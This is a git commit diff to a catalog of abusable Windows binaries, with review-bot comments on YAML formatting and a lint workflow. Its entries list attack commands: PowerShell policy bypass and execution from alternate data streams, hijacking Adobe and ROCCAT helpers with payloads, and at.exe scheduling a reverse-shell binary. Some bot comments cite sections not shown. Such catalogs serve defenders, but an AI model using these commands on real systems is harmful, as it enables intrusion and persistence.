Merge branch 'master' into master
This commit is contained in:
commit
1b15eccf07
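--- a/.github/workflows/yamllinting.yml
+++ b/.github/workflows/yamllinting.yml
@@ -0,0 +1,12 @@
+---
+name: Yaml Lint
+on: [push, pull_request]
+jobs:
+  lintFiles:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v1
+      - name: yaml-lint
+        uses: ibiqlik/action-yamllint@v3
+        with:
+          config_file: .yamllint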
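Review bot: The job runs the third-party `ibiqlik/action-yamllint@v3` and `actions/checkout@v1` from mutable tags with the repository's default `GITHUB_TOKEN` permissions, so a re-pointed or compromised tag executes with whatever the repository default grants. Pin both actions to a full commit SHA (keeping the tag as a trailing comment) and add a top-level `permissions:` / `  contents: read` block, which is all a lint job needs; `actions/checkout@v1` is also long superseded. Because `.yamllint` restricts `yaml-files` to `'*.yml'`, this workflow file lints itself and the default `truthy` rule will warn on the `on:` key, so a `# yamllint disable-line rule:truthy` comment on that line keeps the run clean.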
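--- a/.yamllint
+++ b/.yamllint
@@ -0,0 +1,15 @@
+---
+extends: default
+yaml-files:
+  - '*.yml'
+rules:
+  new-line-at-end-of-file:
+    level: warning
+  trailing-spaces:
+    level: warning
+  line-length:
+    level: warning
+  new-lines:
+    level: warning
+  indentation:
+    level: warning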
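Review bot: Every rule this file overrides is set to `level: warning`, and the `ibiqlik/action-yamllint` step in the workflow does not fail on warnings unless its `strict` input is set, so the new lint job can never block a push or pull request for exactly the problems this commit cleans up (indentation, trailing spaces, missing final newline). Either leave those rules at their default `error` level or add `strict: true` under the step's `with:` so the check is enforcing rather than advisory. Overriding `yaml-files` to only `'*.yml'` also appears to drop `.yamllint` itself and any `*.yaml` file from linting; if that is intended, a comment such as `# only *.yml is linted; the repo does not use .yaml` records it.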
@ -34,7 +34,6 @@ Resources:
|
|||||||
- Link: Threatintelreport...
|
- Link: Threatintelreport...
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: John Doe
|
- Person: John Doe
|
||||||
Handle: @johndoe
|
Handle: '@johndoe'
|
||||||
- Person: Ola Norman
|
- Person: Ola Norman
|
||||||
Handle: @olaNor
|
Handle: '@olaNor'
|
||||||
---
|
|
@ -14,5 +14,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/bohops/status/986984122563391488
|
- https://twitter.com/bohops/status/986984122563391488
|
||||||
Notes: Thanks to Jimmy - @bohops
|
Acknowledgement:
|
||||||
|
- Person: Jimmy
|
||||||
|
Handle: '@bohops'
|
@ -22,5 +22,6 @@ Resources:
|
|||||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||||
- https://attack.mitre.org/wiki/Technique/T1128
|
- https://attack.mitre.org/wiki/Technique/T1128
|
||||||
- https://twitter.com/teemuluotio/status/990532938952527873
|
- https://twitter.com/teemuluotio/status/990532938952527873
|
||||||
Notes: ''
|
Acknowledgement:
|
||||||
|
- Person: ''
|
||||||
|
- Handle: ''
|
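Review bot: The new `Acknowledgement` block ends with `- Handle: ''` as its own list item, so the handle becomes a second mapping `{Handle: ''}` instead of a key of the `Person` entry, while every other section in this commit nests it as `Handle: '@…'` under the person (see the Nltest.exe and Openwith.exe hunks). Indent it under the person, `- Person: ''` followed by `  Handle: ''`, otherwise a consumer sees one author without a handle and one handle without an author. The same shape appears in the `Notes: 'Thanks to '` section and the Robocopy.exe section further down. The enclosing document starts before this hunk.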
@ -2,8 +2,7 @@
|
|||||||
Name: Nltest.exe
|
Name: Nltest.exe
|
||||||
Description: Credentials
|
Description: Credentials
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
||||||
Description: ''
|
Description: ''
|
||||||
@ -14,4 +13,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/sysopfb/status/986799053668139009
|
- https://twitter.com/sysopfb/status/986799053668139009
|
||||||
- https://ss64.com/nt/nltest.html
|
- https://ss64.com/nt/nltest.html
|
||||||
Notes: Thanks to Sysopfb - @sysopfb
|
Acknowledgement:
|
||||||
|
- Person: Sysopfb
|
||||||
|
Handle: '@sysopfb'
|
||||||
|
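Review bot: If the lower of the two `Created` lines in the first hunk is the new side, `Created: 2018-05-25` loses its quotes, so a YAML 1.1 loader such as PyYAML returns a `datetime.date` here while `Created: '2019-03-19'` (aswrundll.exe) and `Created: '2021-10-07'` (Certoc.yml) in the same commit stay strings; the field then has two types across the corpus and any consumer that sorts or formats it must special-case one of them. Keep the value quoted, `Created: '2018-05-25'`, as the Openwith.exe and Update.exe sections of this commit do. The same unquoted date appears in the Robocopy, AcroRd32, Gpup, Nlnotes, Notes, Nvudisp, Nvuhda6, ROCCAT_Swarm, Setup, Usbinst, VBoxDrvInst, winword, testxlst, At, Atbroker, Bash, Bitsadmin, CertReq and Certutil sections.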
@ -3,7 +3,6 @@ Name: Openwith.exe
|
|||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: '2018-05-25'
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: OpenWith.exe /c C:\test.hta
|
- Command: OpenWith.exe /c C:\test.hta
|
||||||
Description: Opens the target file with the default application.
|
Description: Opens the target file with the default application.
|
||||||
@ -16,5 +15,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/harr0ey/status/991670870384021504
|
- https://twitter.com/harr0ey/status/991670870384021504
|
||||||
Notes: Thanks to Matt harr0ey - @harr0ey
|
Acknowledgement:
|
||||||
|
- Person: Matt harr0ey
|
||||||
|
Handle: '@harr0ey'
|
@ -3,7 +3,6 @@ Name: Powershell.exe
|
|||||||
Description: Execute, Read ADS
|
Description: Execute, Read ADS
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: '2018-05-25'
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: powershell -ep bypass - < c:\temp:ttt
|
- Command: powershell -ep bypass - < c:\temp:ttt
|
||||||
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
||||||
@ -14,5 +13,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||||
Notes: Thanks to Moriarty - @Moriarty_Meng
|
Acknowledgement:
|
||||||
|
- Person: Moriarty
|
||||||
|
Handle: '@Moriarty_Meng'
|
@ -18,5 +18,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
||||||
Notes: 'Thanks to '
|
Acknowledgement:
|
||||||
|
- Person: ''
|
||||||
|
- Handle: ''
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Robocopy.exe
|
Name: Robocopy.exe
|
||||||
Description: Copy
|
Description: Copy
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
Categories: []
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
|
- Command: Robocopy.exe C:\SourceFolder C:\DestFolder
|
||||||
@ -16,5 +16,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
||||||
Notes: Thanks to Name of guy - @twitterhandle
|
Acknowledgement:
|
||||||
|
- Person: ''
|
||||||
|
- Handle: ''
|
@ -2,8 +2,7 @@
|
|||||||
Name: AcroRd32.exe
|
Name: AcroRd32.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
||||||
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/997997818362155008
|
- https://twitter.com/pabraeken/status/997997818362155008
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Gpup.exe
|
Name: Gpup.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
||||||
Description: Execute another command through gpup.exe (Notepad++ binary).
|
Description: Execute another command through gpup.exe (Notepad++ binary).
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/997892519827558400
|
- https://twitter.com/pabraeken/status/997892519827558400
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Nlnotes.exe
|
Name: Nlnotes.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||||
Description: Run PowerShell via LotusNotes.
|
Description: Run PowerShell via LotusNotes.
|
||||||
@ -14,4 +13,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
Acknowledgement:
|
||||||
|
- Person: Daniel Bohannon
|
||||||
|
Handle: '@danielhbohannon'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Notes.exe
|
Name: Notes.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||||
Description: Run PowerShell via LotusNotes.
|
Description: Run PowerShell via LotusNotes.
|
||||||
@ -14,4 +13,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||||
- https://twitter.com/HanseSecure/status/995578436059127808
|
- https://twitter.com/HanseSecure/status/995578436059127808
|
||||||
Notes: Thanks to Daniel Bohannon - @danielhbohannon
|
Acknowledgement:
|
||||||
|
- Person: Daniel Bohannon
|
||||||
|
Handle: '@danielhbohannon'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Nvudisp.exe
|
Name: Nvudisp.exe
|
||||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Nvudisp.exe System calc.exe
|
- Command: Nvudisp.exe System calc.exe
|
||||||
Description: Execute calc.exe as a subprocess.
|
Description: Execute calc.exe as a subprocess.
|
||||||
@ -23,4 +22,7 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Nvuhda6.exe
|
Name: Nvuhda6.exe
|
||||||
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
Description: Execute, Copy, Add registry, Create shortcut, kill process
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: nvuhda6.exe System calc.exe
|
- Command: nvuhda6.exe System calc.exe
|
||||||
Description: Execute calc.exe as a subprocess.
|
Description: Execute calc.exe as a subprocess.
|
||||||
@ -23,4 +22,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
||||||
Notes: Thanks to Adam - @hexacorn
|
Acknowledgement:
|
||||||
|
- Person: Adam
|
||||||
|
Handle: '@hexacorn'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: ROCCAT_Swarm.exe
|
Name: ROCCAT_Swarm.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
||||||
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/994213164484001793
|
- https://twitter.com/pabraeken/status/994213164484001793
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -21,7 +21,7 @@ Detection:
|
|||||||
Resources:
|
Resources:
|
||||||
- Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
|
- Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
|
||||||
- Link: https://twitter.com/bartblaze/status/1107390776147881984
|
- Link: https://twitter.com/bartblaze/status/1107390776147881984
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Bart
|
- Person: Bart
|
||||||
Handle: @bartblaze
|
Handle: '@bartblaze'
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Setup.exe
|
Name: Setup.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Run Setup.exe
|
- Command: Run Setup.exe
|
||||||
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/994381620588236800
|
- https://twitter.com/pabraeken/status/994381620588236800
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -3,6 +3,7 @@ Name: Update.exe
|
|||||||
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
|
Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
|
||||||
Author: 'Jesus Galvez'
|
Author: 'Jesus Galvez'
|
||||||
Created: '2020-11-01'
|
Created: '2020-11-01'
|
||||||
|
Commands:
|
||||||
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||||
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
|
Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
|
||||||
Usecase: Execute binary
|
Usecase: Execute binary
|
||||||
@ -14,5 +15,5 @@ Created: '2020-11-01'
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: '%localappdata%\Whatsapp\Update.exe'
|
- Path: '%localappdata%\Whatsapp\Update.exe'
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process
|
- IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
|
||||||
---
|
---
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: Usbinst.exe
|
Name: Usbinst.exe
|
||||||
Description: Execute
|
Description: Execute
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
||||||
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/993514357807108096
|
- https://twitter.com/pabraeken/status/993514357807108096
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -2,8 +2,7 @@
|
|||||||
Name: VBoxDrvInst.exe
|
Name: VBoxDrvInst.exe
|
||||||
Description: Persistence
|
Description: Persistence
|
||||||
Author: ''
|
Author: ''
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Categories: []
|
|
||||||
Commands:
|
Commands:
|
||||||
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
||||||
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
||||||
@ -13,4 +12,6 @@ Code_Sample: []
|
|||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/993497996179492864
|
- https://twitter.com/pabraeken/status/993497996179492864
|
||||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
Acknowledgement:
|
||||||
|
- Person: Pierre-Alexandre Braeken
|
||||||
|
Handle: '@pabraeken'
|
||||||
|
@ -1,20 +1,20 @@
|
|||||||
Name: aswrundll.exe
|
Name: aswrundll.exe
|
||||||
Description: This process is used by AVAST antivirus to run and execute any modules
|
Description: This process is used by AVAST antivirus to run and execute any modules
|
||||||
Author: Eli Salem
|
Author: Eli Salem
|
||||||
Created: 19\03\2019
|
Created: '2019-03-19'
|
||||||
Commands:
|
Commands:
|
||||||
- Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"
|
- Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'
|
||||||
Description: Load and execute modules using aswrundll
|
Description: Load and execute modules using aswrundll
|
||||||
Usecase: Execute malicious modules using aswrundll.exe
|
Usecase: Execute malicious modules using aswrundll.exe
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Any
|
Privileges: Any
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Avast Software\Avast\aswrundll
|
- Path: 'C:\Program Files\Avast Software\Avast\aswrundll'
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]
|
- Code: '["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]'
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
|
- Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Eli Salem
|
- Person: Eli Salem
|
||||||
handle: https://www.linkedin.com/in/eli-salem-954728150
|
handle: 'https://www.linkedin.com/in/eli-salem-954728150'
|
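Review bot: The `handle:` key on the last line of the hunk is lowercase while every other entry in this commit uses `Handle:` (for example the Bash.exe and Bitsadmin.exe sections), so a consumer reading `Acknowledgement[].Handle` will not find this one; the line was rewritten to add quotes but the key was left as is. Change it to `Handle: 'https://www.linkedin.com/in/eli-salem-954728150'`. `Author: Eli Salem` is also the only unquoted author value in the commit; harmless, but worth quoting to match `Author: 'Ensar Samil'` and the others.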
@ -2,7 +2,7 @@
|
|||||||
Name: winword.exe
|
Name: winword.exe
|
||||||
Description: Document editor included with Microsoft Office.
|
Description: Document editor included with Microsoft Office.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: winword.exe /l dllfile.dll
|
- Command: winword.exe /l dllfile.dll
|
||||||
Description: Launch DLL payload.
|
Description: Launch DLL payload.
|
||||||
@ -10,7 +10,7 @@ Commands:
|
|||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||||
@ -26,4 +26,4 @@ Acknowledgement:
|
|||||||
Handle: '@@vysecurity'
|
Handle: '@@vysecurity'
|
||||||
- Person: Adam (Internals)
|
- Person: Adam (Internals)
|
||||||
Handle: '@Hexacorn'
|
Handle: '@Hexacorn'
|
||||||
---
|
---
|
||||||
|
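Review bot: The context line `Handle: '@@vysecurity'` in the last hunk carries a doubled `@`, which looks like a typo that the quoting pass preserved rather than fixed. Change it to `Handle: '@vysecurity'` so the handle matches the single-`@` form used by every other entry. The `Acknowledgement` list starts before this hunk.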
@ -2,18 +2,18 @@
|
|||||||
Name: testxlst.js
|
Name: testxlst.js
|
||||||
Description: Script included with Pywin32.
|
Description: Script included with Pywin32.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
- Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||||
Categories: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1064
|
MitreID: T1064
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
- Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
|
||||||
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
|
||||||
Categories: Execution
|
Category: Execution
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1064
|
MitreID: T1064
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||||
@ -25,4 +25,6 @@ Detection: []
|
|||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/bohops/status/993314069116485632
|
- https://twitter.com/bohops/status/993314069116485632
|
||||||
- https://github.com/mhammond/pywin32
|
- https://github.com/mhammond/pywin32
|
||||||
Notes: Thanks to Jimmy - @bohops
|
Acknowledgement:
|
||||||
|
- Person: Jimmy
|
||||||
|
Handle: '@bohops'
|
||||||
|
@ -2,12 +2,12 @@
|
|||||||
Name: At.exe
|
Name: At.exe
|
||||||
Description: Schedule periodic tasks
|
Description: Schedule periodic tasks
|
||||||
Author: 'Freddie Barr-Smith'
|
Author: 'Freddie Barr-Smith'
|
||||||
Created: '2019-09-20'
|
Created: 2019-09-20
|
||||||
Commands:
|
Commands:
|
||||||
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
|
- Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
|
||||||
Description: Create a recurring task to execute every day at a specific time.
|
Description: Create a recurring task to execute every day at a specific time.
|
||||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: Local Admin
|
Privileges: Local Admin
|
||||||
MitreID: T1053
|
MitreID: T1053
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||||
@ -17,10 +17,10 @@ Full_Path:
|
|||||||
- Path: C:\WINDOWS\SysWOW64\At.exe
|
- Path: C:\WINDOWS\SysWOW64\At.exe
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Scheduled task is created
|
- IOC: Scheduled task is created
|
||||||
- IOC: Windows event log - type 3 login
|
- IOC: Windows event log - type 3 login
|
||||||
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
|
- IOC: C:\Windows\System32\Tasks\At1 (substitute 1 with subsequent number of at job)
|
||||||
- IOC: C:\Windows\Tasks\At1.job
|
- IOC: C:\Windows\Tasks\At1.job
|
||||||
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
- IOC: Registry Key - Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\At1.
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://freddiebarrsmith.com/at.txt
|
